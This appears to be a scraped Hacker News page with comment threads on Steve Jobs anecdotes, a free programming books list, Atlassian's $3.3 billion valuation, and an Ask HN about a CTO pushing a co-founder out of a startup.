Anybody know which, if any, of the SSL cert vendors don't use OpenSSL?
avodonosov 4 days ago 0 replies      
OMG, you've exposed all those intruders-oligopolists!
rubbsdecvik 4 days ago 1 reply      
PGP would be a problem for high load servers too.

"Why not use public-key encryption for everything?

At face value, it seems that the existence of public-key encryption algorithms obsoletes all our previous secret-key encryption algorithms. We could just use public key encryption for everything, avoiding all the added complexity of having to do key agreement for our symmetric algorithms. By far the most important reason for this is performance. Compared to our speedy stream ciphers (native or otherwise), public-key encryption mechanisms are extremely slow. A single 2048-bit RSA encryption takes 0.29 megacycles, decryption takes a whopping 11.12 megacycles. To put this into comparison, symmetric key algorithms work in order of magnitude 10 or so cycles per byte in either direction. In order to encrypt or decrypt 2048 bytes, that means approximately 20 kilocycles."


EDIT: I suck at copy-pasta

strictfp 4 days ago 0 replies      
WoT and CA systems are both problematic since they can be altered on the fly and thus 'hijacked'.

I wonder if we wouldn't be better of with something similar to what SSH does. Accept trust the first time and verify that the signature doesn't change on every subsequent connection attempt. This way one would be immune to hijacks.

It wouldn't solve first time verification, but how likely is a first time spoof? And for really sensitive communications you could use pre-shared keys. I could for instance get a hardware token from my bank containing their public key.

Memories of Steve donmelton.com
371 points by zekers  2 days ago   151 comments top 23
salgernon 2 days ago 9 replies      
Back in 1999 or 2000, shortly after Steve had rejiggered the cafeteria staff, I was walking back to my office in another building with an "afternoon doughnut" - that is, one that hadn't sold in the morning at the coffee place in the main lobby, and probably sold at a discount.

I passed Steve in the hall and he glared at me as I walked with my doughnut. Steve was in great health in those days while I was pasty and obese. (Still am, sad to say.).

But I was happy with my doughnut. Steve glared at me but didn't say anything. I slunk away.

The next day, there were no more doughnuts at any of the cafs on the main campus. I don't think it's a coincidence.

baldfat 2 days ago 1 reply      
I had to stop reading. I also worked for a micro managing CEO/President and I HATED EVERY MINUTE. Knowing that if you did the slightest misstep or were falsely accused you were fired and there was a morning meeting the next day to tell everyone that so and so was no longer with the company. NO THANK YOU!!!
adrianoconnor 2 days ago 1 reply      
I always love to read Don's stories, they're always pretty great, and this post is no exception. The last few paragraphs are poignant, and not because it's about Steve, but because the emotion is real and you can relate to it.

Anyway, if you enjoyed this, you should read the history of Safari posts he did a while back, also a podcast he was a guest on one time, though I forget who it was with -- ah, Debug I think -- that was really excellent and well worth listening to.

general_failure 2 days ago 4 replies      
It looks like some people like Steve are charismatic enough to get the complete devotion of very talented people. It's a great personality trait to have and pretty much guarantees success. We all know geniuses in our everyday life like Wozniak, Bob, cook. But how many of us can get these guys be terrified of us, make them change their lives for our visin and make them give us their complete attention... That's the beauty of Steve. Despite flaws in his character, people seem to be feel previliged working for him.
ZeroGravitas 2 days ago 1 reply      
If after working with him for a decade you have to take a deep breath before you can give him your honest opinion on something, then he's not a busy executive who prioritizes efficient information exchange, he's an asshole.
exodust 1 day ago 0 replies      
This story says more about the insecurity of the Safari guy than it does about Jobs.

Sounds like people at Apple spent too much time worrying about what Steve thought of them, whether he'd remember their names or invite them to meetings.

While everyone is worried about what one man thinks, the man himself was thinking about design and business issues, trying to solve problems.

Funny how bookmarks was never really solved in Safari. On my iPad, I hate the bookmarks functionality, it confuses me pretty much every time. When I try to find a bookmark, or add a bookmark, every time it seems I have to "figure out" and remember how to do that. It's not intuitive or snappy. And now with iOS7 flat design, all your bookmarks and history appears as one big list - black text on white background. The lack of interface delineation mean elements bleed into other elements and make it harder to mentally remember where things are found.

If Steve were still around, he'd be kicking someone's ass over the half-baked iOS7 flat design.

mildtrepidation 2 days ago 0 replies      
It's certainly interesting to read this sort of reflection. The author discusses Jobs' mannerisms without either worshiping or demonizing him, which is refreshing.
xcntktn 2 days ago 0 replies      
Stories like this one and Glenn Reid's essay[1] about working with Steve on iMovie seem to be vastly more informative than any movie or book on SJ.[2] One of the biggest takeaways from both of these essays is that working with Steve was an iterative process. Pop culture always highlights "eureka" moments where a problem is solved all at once in a brilliant flash of insight, yet when you read these first-hand accounts, the story is the opposite: that making something great is a slow and repetitive process, with lots of follow-up meetings and gradual improvement towards the final product. Eureka moments look good on TV, but in the real world, great things are built by long-term focus and hard work from highly talented people with uncompromisingly high standards. I have no idea how or even if that could be shown in a movie, but I'm very thankful we have these accounts. I hope more people who worked with Steve during his second tenure eventually put their thoughts down in writing and share them so that we can all gain more of these types of insights.


[2]There's also Andy Hertzfeld's folklore.org, however that is focused on Steve's original tenure at Apple, not the "comeback" from the late-90s on.

gdonelli 2 days ago 0 replies      
Don has always been such a positive person to be around. Great memories. Thanks for sharing.
ghiculescu 2 days ago 1 reply      
Some great stories there. Wasn't sure on the Apple stores presentation joke though, can anyone explain the reference?
ksec 2 days ago 3 replies      
I was reading and hoping there was an explanation why Safari for Windows discontinued. It is the only popular WebKit browser ( after Chrome fork to Blink ) on Windows.

Otherwise another great piece.

tareqak 2 days ago 2 replies      
I enjoyed the recollections. I probably would have been afraid of his shadow if I was there.

On another note, it would be interesting to see if a website containing all these memories of Steve Jobs ever comes about. A crowdsourced biography if you will: storiesabout/stevejobs .

mathattack 2 days ago 0 replies      
Great stories. It says a lot about Apple that time, in addition to Steve. The personal side is good too.

Yes, Steve could be intense at times. But he was also a real person. He had to deal with the ordinary and mundane aspects of life like everyone else. Maybe even enjoy them.

throwaway7548 2 days ago 5 replies      
According to Wozniak, Jobs told him that Atari gave them only $700 (instead of the offered $5,000), and that Wozniak's share was thus $350.[65] Wozniak did not learn about the actual bonus until ten years later, but said that if Jobs had told him about it and had said he needed the money, Wozniak would have given it to him.[66]---

End of story. Before continuing celebrating Jobs, ask yourself a question, do you want to promote that kind of behavior in the Valley?

hubtree 2 days ago 2 replies      
This part sums up why I quit using OS X for my personal projects: "And if your software crashed, you didnt make excuses. You just made damn sure that particular scenario didnt happen again. Ever."

In making sure nothing ever crashes, Apple has moved more and more to an OS that is too restrictive for my taste.

jayvanguard 2 days ago 0 replies      
Sounds like you have to be a sycophant to work for him.
theRhino 2 days ago 0 replies      
this is hilarious
pskittle 2 days ago 0 replies      
Thanks for posting this!
SimHacker 2 days ago 0 replies      
At the National Air and Space Museum reception during Washington DC EduCom in 1988, I took a big bite out of one lobe at the bottom of a three lobed red bell pepper so it looked like an alien's face, and held it up to Steve Jobs, and said "Earthman, give me your seed!"

He looked at me funny, but I couldn't tell if he got the reference to Bizarre Sex #10: http://silezukuk.tumblr.com/post/3151672333 [NSFW]

luser 2 days ago 1 reply      
Alternative title: Hagiography of a Dead Psychopath CEO
jmnicolas 2 days ago 2 replies      
Am I the only one fed-up with Steve Jobs stories ?
misingnoglic 2 days ago 0 replies      
Lol, some of it seems a bit stockholm syndrome-y, but hilarious nonetheless.
normloman 2 days ago 1 reply      
Why are we still talking about this guy. I'll bet my life savings that when Woz dies, we'll talk about it for around 2 months.
Free Programming Books github.com
366 points by nilsbunger  4 days ago   47 comments top 23
hawkharris 4 days ago 3 replies      
There seems to be a big trend toward authors publishing programming books for free online and offering hard copies that you buy, too. In general, if someone offers me a free product and a paid one, I'll stick with free. No surprise there. But coding books are an interesting exception.

I find it much easier to learn a new language when I'm using a book instead of reading it for free online. A book is a single-purpose device; you can only use it to learn about one topic, or set of topics. It doesn't vibrate, notify me of emails and text or encourage me to go on other tangents. For a goal such as learning R or Haskell, which requires a lot of mental energy, having this extra focus makes a big difference.

nilsbunger 4 days ago 1 reply      
I'm digging into "Is Parallel Programming Hard, And, If So, What Can You Do About It?" https://www.kernel.org/pub/linux/kernel/people/paulmck/perfb... and liking it!
computerjunkie 4 days ago 0 replies      
An awesome list! I saw this list on stack overflow before it was transferred to Github. It really does save you loads of time as compared to searching for books using Google.

Another fantastic resource, http://pineapple.io/

Edit: not sure why i've been downvoted? is it because I recommended another resource?

hf 4 days ago 1 reply      
A fine, curated list.

As with most meta-topical lists, there is virtuallyno profit in browsing through it. Time may be wasteda-plenty, though.

Bring a question about technology X with you, go straightto section X and then consult with the search engine ofyour choice (or a hacker friend, idealy) which book toactually read.

Hint: some of those have wikipedia-pages, likehttps://en.wikipedia.org/wiki/Higher-Order_Perland others hide the books behind an emailsignup front(one is a strong signal for quality, the other, perhaps,not so much).

hmhrex 4 days ago 1 reply      
Dumb question here: Any way to maybe download all the PDF/HTML books in one big collection? I could imagine it being pretty huge, but I might interested in downloading it.
ZenPro 12 hours ago 0 replies      
Quite simply a phenomenal resource and one of the best links I have ever seen posted on HN.
rubiquity 3 days ago 0 replies      
My favorite free programming books are anything by Beej. His networking[0] and C[1] books are simply phenomenal.

0 - http://beej.us/guide/bgnet/

1 - http://beej.us/guide/bgc/

ryannevius 4 days ago 0 replies      
thyrsus 3 days ago 1 reply      
It's not clear to me what the policy is on links to copyright violating offers, e.g., "jQuery: Novice to Ninja: New Kicks and Tricks - SitePoint". SitePoint.com is currently asking $29 for that eBook, and graciously appears not to be applying DRM. Unfortunately, the phrase "really free" in CONTRIBUTING.md does not really resolve the question.

So what version of "free" does the list intend?

lmedinas 4 days ago 2 replies      
The link is great but how many times it was posted here ?
aswanson 3 days ago 0 replies      
Thanks much. The collection of this many resources in one place has improved my life.
suyash 4 days ago 0 replies      
Not all of them are books, some of them are long blog posts some just web pages.
Imouto 3 days ago 0 replies      
Is this easily available in a single torrent?If not I see no reason of not just getting Gentoomen library.


gansai 4 days ago 2 replies      
Does this github project handle the scenario where some of the URLs become dead links or some of the domains expire?Automatically, these links/domains need not be shown to the user.
AbhishekBiswal 4 days ago 2 replies      
Man, people should write ore books on Flask framework. :(
erikano 4 days ago 1 reply      
Nice. But how do I decide which to start reading and in which order to continue?
sdsk8 4 days ago 1 reply      
I need a good book on emulation, i wan't to write an old console emulator.Anyone know a good material for that?


greyfox 4 days ago 0 replies      
wow, great link thanks for that, i wish they were exportable to PDF, i too prefer physical (paper) books, but was given an e-reader for xmas and have been reading lots of pdf's on it.
user1241320 4 days ago 1 reply      
Great! I'd love to read something on http://ceylon-lang.org or http://kotlin.jetbrains.org
xxxmadraxxx 4 days ago 0 replies      
Great resource, thanks!

[From someone else who's not seen it before]

nagarch 4 days ago 0 replies      
very good ollection
increment_i 4 days ago 0 replies      
Skimming through this list was jaw dropping.
quackerhacker 4 days ago 1 reply      
I'm moving over to MongoDB (NoSQL), but an EXTREMELY awesome book that I have in my collection is SQL Hacks. It's published by O'Reilly. It's an extremely awesome book on optimizing SQL queries appropriately. It's not in this list, but I definitely recommend it!!!!
Atlassian Valued at $3.3 Billion wsj.com
351 points by asaddhamani  5 days ago   161 comments top 24
rgrieselhuber 5 days ago 7 replies      
This is a company that was founded in 2001.

I still remember their CEO building his original audience on TheServerSide.com, back when Enterprise Java was the thing.

They took 13 years to get to this point, a solid 8-9 years longer than most enterprise SaaS companies are expected to take (by VCs). And yet, not a single VC I've asked if they wish they were in Atlassian has said no.

You can build huge companies on your own terms and you don't have to swallow the story that everybody tries to feed you. You do need to do one thing though (and only one thing): get traction and keep it growing.

bane 5 days ago 3 replies      
I don't know why, but this makes me feel good. Like a world that makes sense. A regular old business, that makes money and continues to grow and make more money, gets valued on a nice speculative curve, doesn't make useless dodads or chat apps or whatever and went from $0 to $xx billion valuation in a couple years because it has some possible tangential business tie in with somebody else, but instead makes something useful.

It feels like the universe makes sense again.

dangoor 5 days ago 4 replies      
First sentence in the article: "Atlassian, an Australian maker of online collaboration tools for businesses, is gunning for the same market as fast-growing startup Box Inc."

Saying that they're gunning for the same market seems a stretch to me. No one's going to say "I was thinking of buying Jira, but I just went with Box instead."

Leading off with drawing parallels between Atlassian and Box just strikes me as not helpful.

edit: grammars

malanj 5 days ago 4 replies      
Really cool that you can reach that kind of valuation with a basket of products, rather than a single run-away network effect fueled win. I find it very inspirational that they do that well by building great software that people love.

also: They really make awesome products (we use BitBucket, HipChat and Confluence)

polskibus 5 days ago 3 replies      
They do seem to be the best in a very competitive market. There are loads of either commercial or open source issue trackers, wikis, combinations of both, etc. etc. How will they grow past that ? Acqusitions? Writing custom JIRA plugins that will make it more like an ERP ? Ideas?
lnanek2 5 days ago 0 replies      
Don't really understand why they are comparing Box and Atlassian the whole article. Box is cloud storage. Atlassian is programming tools like issue trackers, wikis, etc.. It's like comparing DropBox and StackOverflow. It doesn't make much sense.
hyp0 5 days ago 1 reply      
oblig. BitBucket has free private repo's https://www.atlassian.com/software/bitbucket/overview

you don't get to 3 billion dollars without giving away a lot of stuff for free to infiltrate the enterprise

allochthon 5 days ago 0 replies      
These multi-billion dollar valuations are uncomfortably close to the 3b needed by VCs to get the carried interest commission, mentioned here [0].

[0] http://modelviewculture.com/pieces/five-reasons-not-to-raise...

nodata 5 days ago 1 reply      
Sold for more than Nest. At last something that makes sense!
dkarapetyan 5 days ago 4 replies      
I don't understand any of this. Every atlassian product I have ever used has been terrible. All their software is full of performance issues, uncountable UI bugs, and every time we upgrade it's impossible to tell whether we lost any data in the process and several times we have lost data. Their continuous integration server, Bamboo, is pretty to look at but unusable except for the lightest of use cases. The message broker between master and slave constantly goes down, publishing artifacts is hit or miss based on various network conditions that are mostly out of my hands because we're in AWS and I think they use chunked encoding to transfer the artifacts.

Honestly, if they're worth $3.3 billion then the software industry is doomed. Maybe that's a bit over the top but the quality of the products based on what I read doesn't add up. How can you do so much R&D and still have a product that's so unstable and can't handle simple network hiccups?

sergiotapia 4 days ago 1 reply      
I love Atlassian products. I use it on every project I make, and recommend it to clients when we need a place to keep workflow centralized.

We use:

JIRA - For issuesBitbucket - For code repositoryConfluence - For documentationBamboo - For a build server and CI

I'd love to settle on HipChat as well but it's stupidly difficult to get it to pull git commits and other things directly into chat.

Flowdock is much much simpler in usage, UI and integration - so Atlassian team, if you're reading this: Let me 1-click integrate git commit notification into a HipChat room of my choosing, you own both products - make them connect in the easiest most straightforward way!

ToastyMallows 5 days ago 1 reply      
I'm not surprised. We use Crucible at work and everyone loves it. Atlassian makes some great prodcuts.
jmacd 5 days ago 0 replies      
I met Mike and Scott in 2004 and they were incredibly humble, focused and benevolent then. From what I can tell they seem to have maintained that through the years and all their success. They also had a President of their company names Jeffery Walker, who was one of the kindest and most interesting guys I've ever met.

This is a company that is learning too. Since the acquisition of HipChat they have made the product dramatically better. If they can get a good model in place for further acquisitions, and they can continue to successfully launch their own products as well as they have in the last few years, then this company is on track to being worth a hell of a lot more than $3.3bn.

rpowers 5 days ago 0 replies      
Good! I enjoy their tools and think they really deserve that.
neovive 5 days ago 0 replies      
Congratulations to Atlassian. We've been using a locally-hosted Confluence instance for over 3 years in a higher education setting and it's been a great experience. The more I use Confluence, the more I see it's true value as a collaboration platform. The uptake among users has been great and the sharing of information has grown exponentially. The product consistently improves and gets easier to use over time as opposed to typical enterprise applications.
nraynaud 5 days ago 2 replies      
What would be the exit for the VCs? they could have kept it private without the VCs, but I don't think VCs line up for dividends at the end of the years. That forces them to create an exit event for a company that seems in a nice path.
Lambdanaut 5 days ago 0 replies      
I personally don't see the value in their product, but they've got huge market saturation so that valuation sounds about right.
mark_l_watson 5 days ago 0 replies      
Their git service is really first rate. I have always felt a little guilty that I don't pay them for services rendered, so I would like to at least give the Atlassian crew my best wishes.
veidelis 5 days ago 0 replies      
The company I work for uses both Confluence and Jira. We find those very helpful, but the price of plugins for additional functionality is too high, imho.
thrillgore 5 days ago 1 reply      
I can sorta see the value in Atlassian, with Jira being used what seems everywhere.
EGreg 5 days ago 1 reply      
Anyone here think JetBrains is in the same space and can also fetch a huge valuation?

Also don't forget, Atlassian runs BitBucket! And look at GitHub's valuation.

startupranks 5 days ago 1 reply      
Now #11 on www.thestartup100.com

> 1/3 of the top 100 are SaaS, but not all are purely enterprise.

stephengillie 5 days ago 8 replies      
We've had a rough, shaky time using Jira, but it's almost entirely due to internal politics and constantly-shifting business priorities. (aka CEOs and owners who are just megaphones for their corporate customers) We intended to replace our invented-here ticketing system (which has Zendesk integration) with Jira, but instead we integrated Jira into that invented-here ticket system.

On the other side, my team has been bit by a bug from 2008 which prevents us from changing any ticket's state to Resolved. We can Resolve tickets, but their Resolution remains Unresolved. Since the Resolved state is central to most of Jira's built-in features, this means Jira has been broken for me since we installed it 6 months ago. The Your Issues default display shows all my tickets, including my closed tickets. The interface is not customizable enough to build workarounds for this problem.

Also, the name (bastardizing the Japanese pronunciation of Godzilla) always feels somewhat racist to me.

Elof 5 days ago 2 replies      
That's only 3.3 Instagram's, one Snapchat, or .21 WhatsApp's. Solid proof consumer tech is always more profitable then enterprise tech.
Ask HN: CTO wants me to leave
348 points by cantlookaway  1 day ago   254 comments top 115
Bluestrike2 22 hours ago 10 replies      
You need to hire an attorney, one who works in business litigation (if you can find someone specializing in minority shareholder disputes, that much the better). Right now. If you're delaying on this point out of some idea of wanting to "try to fix things first" or "not wanting to be the bad guy," you're just shooting yourself in the foot and downing blood thinners to keep the wound from clotting. Working with an attorney is not the same as filing suit, and you will never be worse off in this sort of situation for having sought outside counsel. You also need to find your own attorney; the company's counsel works for the company itself, not for any of its investors, executives, or employees.

Judging from your story, your situation is pretty clear: you're being squeezed-out. Sadly, it's not uncommon. Though he might not be asking you to leave right now, framing it as in a few months is just an effort to (i) get some additional benefit out of you, and (ii) give them the time they need to break you.

There are two possibilities right off the bat: (i) the CEO is involved, which is likely given the difficulty involved in squeezing-out a shareholder + 50% co-founder; (ii) the CTO is working alone, hoping to push you out the door and benefit in some way from the resulting vacuum. In either case, you can't move forward without speaking to an attorney. And don't you dare think for one second that you can "just talk to the CEO first."

Already, you're talking about things as an employee rather than an owner. That's your first mistake. An employee might be able to be kicked to the curb, but you're not just an employee. You've already made a significant investment into the company, and from their perspective, an ideal/successful squeeze-out is one that deprives you of that ownership interest entirely. Most of these efforts are successful because they manage to position the person being targeted in a position where they just roll over. Ideally, they force the person being squeezed out to choose to quit rather than actually be fired. It seems like that's the CTO's goal in your situation.

That said, there are few programmers, in my opinion, whose work is so bad that there is zero potential for future improvement. Considering the costs of pushing you out, you'd have to be doing a hell of a lot more than just writing shit code to justify termination. Given that they want to wait until after additional fundraising rounds are completed, I doubt that your involvement with the company is nearly so problematic. Besides, you already stated that there's been a clear improvement in your code.

I was in a similar situation, once. I was foolish, stupid, and trusted a friend I've known for years. I did the development work, partner A brought his business skills and industry contacts to the table along with his money (and a third partner, B, as well). Did the work, but during that time, there was no sight of their money. One of the earliest clues I was going to be screwed was, when discussing fundraising, A mentioned his own deferred pay. Something I thought slightly peculiar given that he was supposed to be investing his own, significant funds along with B. Plus, I don't believe that he actually did any measurable work during the time period that would justify it based on what I knew at the time. Investors are rightly finicky about deferred salaries, and the bar is pretty high to justify them.

When we were at the end, I found myself being squeezed-out: in the end, they apparently figured that it'd be cheaper to outsource to some ridiculous "startup in the box" type of company rather than deal with my deferred pay and the long-term consequences of a third founder's ownership interests) even though doing so would delay things by a couple of months. They even managed to time things well: the weekend of my grandmother's funeral, after A had been told about it, they dropped their little bomb on me. The only good thing was that they walked away without getting a single line of code that I'd written.

My parting was anything but on good terms. Eventually, I wound up not pursuing the matter in court--talking it over with my attorney, it became quite clear that the legal fees of fighting them would be ruinous. That partner C was a shyster of an attorney, and all evidence suggested that they'd just try to wait out the expensive clock rather than consider settling. After all, the cost of doing so would be pretty minimal. Litigation is uncertain and expensive. Painful though it may be, you never ever litigate on principle. Not if you have any brains at all.

Even though I would have likely prevailed given the facts, I would have come up horribly in the red when it was done. A pyrrhic victory and no more. Choosing not to go down that route was one of the harder decisions of my life, made all the more difficult by the knowledge that they had, quite literally, taken even my grandmother's funeral away from me.

Oddly enough, I'm probably better off for it now that I have some distance and perspective to look back. When they launched, it was unobserved and uneventful. Even now, they're unknown with almost no traffic and engagement. They've also made a number of bad mistakes that I had identified--often through trial and error--that I had told them about. It was a submarine rigged for silent running, deep and quiet, that's never bothered to surface for air. All of partner A's vaunted experience and extensive media contacts in the industry proved for naught in the end. Eventually, they'll simply wither and die on the vine. Had they not squeezed me out, no doubt I'd still be hanging on trying to turn things around. After all, who abandons a friend? It was quite the learning experience, albeit an incredibly expensive one.

Luckily, you can avoid that sort of experience by acting now to protect yourself. Document everything, save all of your emails, chat logs, download and archive all Github comments on everything that you've worked on, as well as everything else you can. Make sure that you're also grabbing copies of emails off any servers/accounts they might have access to. Even though it will create problems if there's any litigation, there's a high likelihood that they'll do something foolish such as delete them.

You have a lot going for you right now that'll help you. First, you're obviously still needed to help their raise funds. Second, investors are scared to death of founder disputes. If any potential investors even sniff the possibility, they'll run and never look back while your current investors will raise holy hell, even if the CEO+CTO were able to find some fig leaf of justification. It also implies a deviousness that will scare investors; if they're willing to screw a friend and risk such a serious dispute, then it's also possible that they'll wander into similar situations in the future. Particularly in the early stages, investors and VC firms don't have to put up with that sort of bullshit.

This gives you an absurd amount of leverage: you have the ability to single-handedly kill their fundraising efforts now and in the future. You need to call your attorney and start using it. At the very minimum, it'll put the breaks on any plans they're currently working on. At best, it'll help you move forward as a company without having these sorts of problems lurking about in the shadows.

gtCameron 1 day ago 5 replies      
The question I would try and answer if I were in your shoes is the following:

Does he want me to leave the company or does he want me to stop writing production code for the product?

If its the first one, there is likely a personal issue between the two of you that needs to be resolved one way or another.

If you think the second option is what he is really trying to communicate, then I would look for other opportunities to contribute to the company. It sucks to grasp your own limitations and admit that you might not be a good enough coder to contribute to the product at this point, but this is a critical time for the future of the product. Any technical debt acquired at this phase of development is going to be very costly to pay off later since you are developing the core of the system.

However, you are a founder of the company, and I am assuming very passionate about the company's mission as well as financially motivated to see this thing through. There are tons of jobs that will need to be done as you guys grow, and each one of those is an opportunity for you to contribute above and beyond what a new hire off the street could accomplish. A lot of those jobs can also take advantage of your coding skills to either automate processes or utilize your deeper understanding of how the product works to better support it.

This is of course assuming that you guys have the cash in the bank to pay you for this work, if that is not the case then the situation is a little trickier and you will have to explore other options.

9oliYQjP 1 day ago 2 replies      
First off, I'm sorry about your situation. Nobody here will be able to judge with any degree of accuracy whether he has a point. I personally would not look at this situation as a technical one; this is a business relationship situation.

Regardless of whether there is any grain of truth, the CTO has lost confidence in you. Not just a little bit. He has asked you to leave. The rest of my advice assumes the CEO (your co-founder) has quite a bit of confidence in the CTO. If that is the case, I'm not quite sure you can come back from having the CTO asking you to leave, nor am I certain you should.

I think it would be advisable to talk to a lawyer to see how you can cleanly and professionally leave on your own terms. Save the emotional stuff for friends and your alone time. You will no doubt need to grieve (this was your baby). But I think it would be better for you to be proactive about leaving and professionally extract yourself from this situation. That said, make sure you know your rights and what your contracts entitled you to in such a situation.

Once extracted, take your hurt pride and prove them wrong.

carbocation 1 day ago 1 reply      
You have phrased this as an almost apologetic post, focusing on your ability to write code. An analogy to medicine might be worrying about your ability to take a good history and physical exam, but in the meanwhile the patient is bleeding in front of you.

The problem is not your ability to write code - the CTO even admits as much when he says he needs you now but wants to replace you later. Your code is desperately needed. But I don't really care about this.

Assuming a normal situation, the company is yours and your co-founder's (by ownership), and the CTO likely has a small amount of equity (relative to yours). In an early stage company that hasn't yet raised money, your company is basically an extension of yourself. You don't have responsibilities to shareholders or employees because you don't have either yet. You have a responsibility to yourself and your vision. The CTO did not found the company and that alone tells you that you have some amount of vision, ability, or ability to take advantage of chance that he did not have.

If you want to remain involved in the company, and it seems that you do and should, then you need to clarify for the CTO where the boundaries of his responsibilities lie. His job is not to ask you to quit, and he may be beyond the point where you can continue working with him (or not - I don't know enough detail). But if he is to continue working for you (and do recall that he works for you at your pleasure), he needs to focus on solutions that don't involve him trying to fire you.

Most founders don't end up coding very much after their companies grow, and the CTO may be hopeful to get more experienced programmers working for the company. But there are about 10,000 miles in between "we should hire people with deep experience in X" and "I want you to leave the company." The latter is a political gambit that needs to be dealt with after careful consideration in a way that shows teeth.

avenger123 1 day ago 2 replies      
It looks like you have real equity in the company and there is possible traction in the business.

You are a co-founder. That counts for a lot. I am also assuming that your equity stake is significant.

First of all, deal with this right now. Don't wait for the 3-6 months. You are basically being told that once they have raised money, they will find a way to get you out. Right now, it's a fishing expedition between the CTO and the other founder. Will you be a nice gentle person and go along with their approach or are you going to turn into an attack dog.

You likely have tremendous leverage right now due to this funding round coming up. They will not want to rock the boat. But this is exactly when you should be doing it as I don't believe the "we need you" bit means anything other than "we don't want you to fk up our funding round coming up".

At the end of the day, if they really want you out, they'll find a way to do so. The main thing is that you got to get on the offensive and make sure if you do end up leaving the company, you've left on the best financial terms possible for yourself. Make them pay. In fact, throw out a number you are comfortable with and have them pay you out from that in the next funding round.

If you approach this as "what's best for the company", you have already lost because that's not what this CTO and your other founder are approaching this from.

EDIT: You should provide some more detail on the equity position you have and how formalized it is (ie. proper contracts). Being a co-founder isn't about just writing code. As others have said, if you have significant equity, you have a lot of power. Don't underestimate this.

icambron 22 hours ago 3 replies      
Leave. Seriously, walk away. Here are some thoughts:

1. The situation is poisoned. If you stay and force a battle of wills, it will be hugely distracting in a way that adds no value to the company (and remember, building a great company is why you did this in first place), not to mention personally painful for you. That the CEO and CTO have lost confidence in you means it's just going to suck from here on out. Even if you win, that just means disempowering the CTO (or replacement CTO if the current one leaves in frustration, which doesn't seem improbable). Maybe the CTO is wrong, but if he's saddled with someone he doesn't want and can't get rid of because of special cofounder status, it's going to create a pretty shitty working environment for everyone. And if he wins (say, because the CEO votes you out), then that's the same as you sliding out anyway.

2. The CTO definitely hasn't overstepped his boundaries; he's doing his job. He's responsible for running the engineering team and delivering a product. If he thinks you're holding the company back, he'd be being irresponsible not to do something about it. Of course, he could be wrong and there's no way for me (or anyone else here) to determine that. So you have to ask yourself what you really think is best for the company. If it's you leaving, tanking the company in a huge fight (or just dragging it down by sticking around) will just destroy whatever equity you have in it. If it's you staying and you're confident (after putting aside your ego, considering it from other peoples' views, etc), then yeah, convince the CEO and then together fire the CTO for being so terribly wrong. But it's not an issue of boundaries. So: would you hire you?

3. Closely related: what are you doing cofounding companies with that little confidence in yourself? If someone came to you and said, "hey, I haven't coded much and don't have a lot of experience", would you think that was a wise investment? Because you went all in on that investment. Do some work with some guidance and lower stakes and learn your craft. I don't at all mean that as "noob go home" (I have no idea how good you actually are); I mean that your description basically acknowledges you don't think you're the right person for the job of technical cofounder.

4. Your CEO sounds clueless and you should take this opportunity to bail out. If the CTO is wrong about you, the CEO's confidence in him is misplaced and he's also allowing unnecessary complications to destroy his engineering team. If the CTO is right that you don't even belong on the team, then why did the CEO partner with you in the first place? Maybe he thought of you as a temporary pawn to sacrificed at the right time. Maybe he just doesn't know what he's doing. None of those are good. Get out.

5. You say in one of the comments that you don't want to lose your unvested shares and that you've taken on a lot of opportunity cost. The whole point of the vesting is that you get what you've worked for. If you don't think the vested equity you have is commensurate with the work you've done, working more isn't going to fix that. You'll just continue getting screwed, putting in more time and earning the same vesting that you're unhappy with. I know you probably feel pot-committed, but the best thing to do when you have a bad hand is fold your cards and move on.

6. Startups are hard. They're painful work, especially when things go bad, to the point that I wonder why we do it in the best of situations. If you throw in the stress of trying to prove you even belong, it's just shitty. Save your happiness and leave.

7. It's important not to think of these decisions as an affront to your pride. The never-say-die bromide of startup cofounders the world over is mostly bullshit. Make sure you're in a healthy situation with a real chance of success. Quitting isn't shameful, but sabotaging your happiness and the value of your investment because it hurts your ego is very unwise. I don't know whether or not I'd be wise in that situation either--I certainly have plenty of ego--but of course that's why you asked us: we're not involved.

My guess is that once you leave, clear your head, and figure out what you want to do next, you'll look back and say, "wow, I'm glad I got out of that."

hoodoof 1 day ago 2 replies      
Listen Eduardo Saverin:


The key question here is : do you have equity, and how much equity do you have in percentage terms?

If you are an equal cofounder, then when someone turns up and says "you have to leave cause better people have been employed", you say "fuck off". Think about it - EVERY company that grows will employ people who are better than the cofounders in some way, that is the whole point. You are the FOUNDER, you brought value to the company early. Just because smarter or more experienced people have been employed in no way devalues what you did in the early stages. In fact this is PRECISELY what is meant to happen. Do you think that Zuckerberg is the best developer at Facebook - legend may say so but it's not true - can't be. So should Zuck be fired cause he's not their strongest tech guy?

You also need to think separately about your rights as employee and rights as a shareholder/owner - they are not the same thing. You DO have clear contracts as both employee and shareholder DON'T YOU? Those contracts specify (or should specify) your rights.

And who the fuck does this guy think he is that he can tell a cofounder to leave? You are his BOSS.

DO NOT LEAVE. And if you do leave, DO NOT SELL YOUR SHARES IN THE COMPANY - just say "I want a MASSIVE payout to accept being fired, and I WILL NOT sell my shares as part of settlement". Hang on to those shares because now these guys are going to do all the hard work in growing the company and you can chill out and do other things and when they IPO, you'll take home your share. And if this is the path you take, look out cause some time in the future they will try to play a legal game in which you hang on to your shares but they get diluted down to almost nothing. This cannot happen if you are careful to look out for it.

This is all on the assumption that you do have equity and contracts in place. If you don't, then you should go and watch "The Social Network" repeatedly until you learn your lesson.

anigbrowl 1 day ago 3 replies      
He's trying to fuck you over. Remind him that he works for you, not the other way around. Start looking for his replacement. Check with a lawyer about the security of your own stake and make sure you are good with the business guy, because the CTO has probably been whispering poison in his ear about you.
jw2013 1 day ago 3 replies      
> My question is, does he have a point?

No. He is making the wrong assumption here "that he wouldn't hire me if I wasn't already a founder and not what the company needs". First you ARE a founder- I genuinely do not believe you can't learn the knowledge you needed given how motivated you are. And you are learning. Second, he already admit you are what the company needs (at least during this 3-6 months), so why is he BS you to leave? He's mindset is so wrong for the startup world, just assuming things will take-off and by-then you are not needed anymore. You are desperately needed now; that makes you valuable. Your company probably can't make it to the next milestone in 3-6 months without you, at least it will take longer to hit milestones longer without you. You are valuable, and you feel for the company, just tell him that.

> Is this something that is common?

Yes, but not quite often at this early stage of a startup. I smell some politics of him. Do you two get along well besides tech issues in the company? Since he knows you are still desperately needed now, and he is still making BS about advising you to leave, I can only conclude he probably does not like you (not just in tech realms), and he clearly does not care about the success of the company as much as I do (the company still needs you to be successful at least at this stage of growth).

> Has he overstepped the boundaries?

